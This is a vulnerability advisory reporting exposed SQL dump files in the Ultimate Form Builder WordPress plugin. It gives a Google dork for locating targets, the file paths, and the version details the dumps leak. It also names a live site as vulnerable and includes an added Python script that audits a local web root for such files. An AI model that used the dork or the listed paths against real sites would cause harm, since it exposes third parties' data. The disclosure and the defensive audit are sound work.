############################################################################################
# Exploit Title : WordPress Ultimate Form Builder Plugins 1.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/03/2019
# Vendor Homepage : access-keys.com
# Software Information Link :
codecanyon.net/item/ultimate-form-builder/14644208
accesspressthemes.com/wordpress-plugins/ultimate-form-builder/
access-keys.com/documentation/ultimate-form-builder-lite/
# Software Version : WordPress Version 4.x and 5.x - Plugin Version 1.0
# Software Price : Paid Download - 32$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : filetype:sql inurl:/wp-content/plugins/ultimate-form-builder/
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about phpMyAdmin SQL dump File =>
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
############################################################################################
# Description about Software :
***************************
Ultimate Form Builder is a PREMIUM WordPress plugin which allows you to create unlimited responsive forms
(single-step or multi-step). Any type of form (Contact us, Opt-in, Call-to-Action, Survey, Quotation, Enquiry or anything)
can be built using the drag-and-drop form builder. Using this plugin is super easy and fun because you can create, customize
and build beautiful forms, apply existing form templates for design and use them right on your WP site in no time.
You can receive form submission data via email and store it in the database, from which it can be exported
to CSV for your use via the plugin's backend.
############################################################################################
# Impact :
***********
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
to have access to that information.
* The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.
* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web.
It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server).
The dump typically contains SQL statements to create the table, populate it, or both. This file contains a phpMyAdmin SQL dump.
This information is highly sensitive and should not be found on a production system.
Remediation : Restrict access to this file or remove it from the system.
############################################################################################
# Database Disclosure Exploit :
****************************
/wp-content/plugins/ultimate-form-builder/tables/cities.sql
Information :
***********
-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10
/wp-content/plugins/ultimate-form-builder/tables/countries.sql
Information :
***********
-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10
/wp-content/plugins/ultimate-form-builder/tables/db_country_state_city.sql
Information :
***********
-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10
/wp-content/plugins/ultimate-form-builder/tables/states.sql
Information :
***********
-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10
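A local audit for the remediation above, run against a web root you administer (added example, not part of the original advisory): it lists every .sql file under the root and flags those that begin with the phpMyAdmin dump header shown above, returning the version fields that header exposes. The function names and the sample tree it builds are constructed for illustration.

```python
import os
import re
import tempfile

# Signature and metadata lines as they appear in the dump header quoted in this advisory.
SIGNATURE = "-- phpMyAdmin SQL Dump"
META = re.compile(r"^-- (version|Server version:|PHP Version:) (\S+)")


def read_dump_header(path, max_lines=20):
    """Return the header's version fields if the file starts like a phpMyAdmin dump, else None."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        head = [fh.readline().rstrip("\r\n") for _ in range(max_lines)]
    if not any(line.startswith(SIGNATURE) for line in head[:3]):
        return None
    matches = (META.match(line) for line in head)
    return {m.group(1).rstrip(":"): m.group(2) for m in matches if m}


def audit_webroot(webroot):
    """Walk a local web root and return (relative path, header fields or None) per .sql file."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if name.lower().endswith(".sql"):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, webroot).replace(os.sep, "/")
                findings.append((rel, read_dump_header(full)))
    return sorted(findings, key=lambda item: item[0])


def build_sample_webroot():
    """Constructed sample tree that mirrors the plugin path named in the advisory."""
    root = tempfile.mkdtemp()
    tables = os.path.join(root, "wp-content", "plugins", "ultimate-form-builder", "tables")
    os.makedirs(tables)
    header = ("-- phpMyAdmin SQL Dump\n-- version 3.4.10.1\n--\n-- Host: localhost\n"
              "-- Server version: 5.5.20\n-- PHP Version: 5.3.10\n")
    samples = {"states.sql": header + "CREATE TABLE states (id INT);\n", "notes.sql": "SELECT 1;\n"}
    for name, body in samples.items():
        with open(os.path.join(tables, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, meta in audit_webroot(build_sample_webroot()):
        print(rel, "phpMyAdmin dump" if meta is not None else "plain .sql", meta or "")
```

Every path it reports is a candidate for removal or for a web-server deny rule on .sql files; the flagged ones additionally disclose phpMyAdmin, database server and PHP versions.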
############################################################################################
# Example Vulnerable Sites :
*************************
[+] ema-ic.it/wp-content/plugins/ultimate-form-builder/tables/states.sql
############################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################################################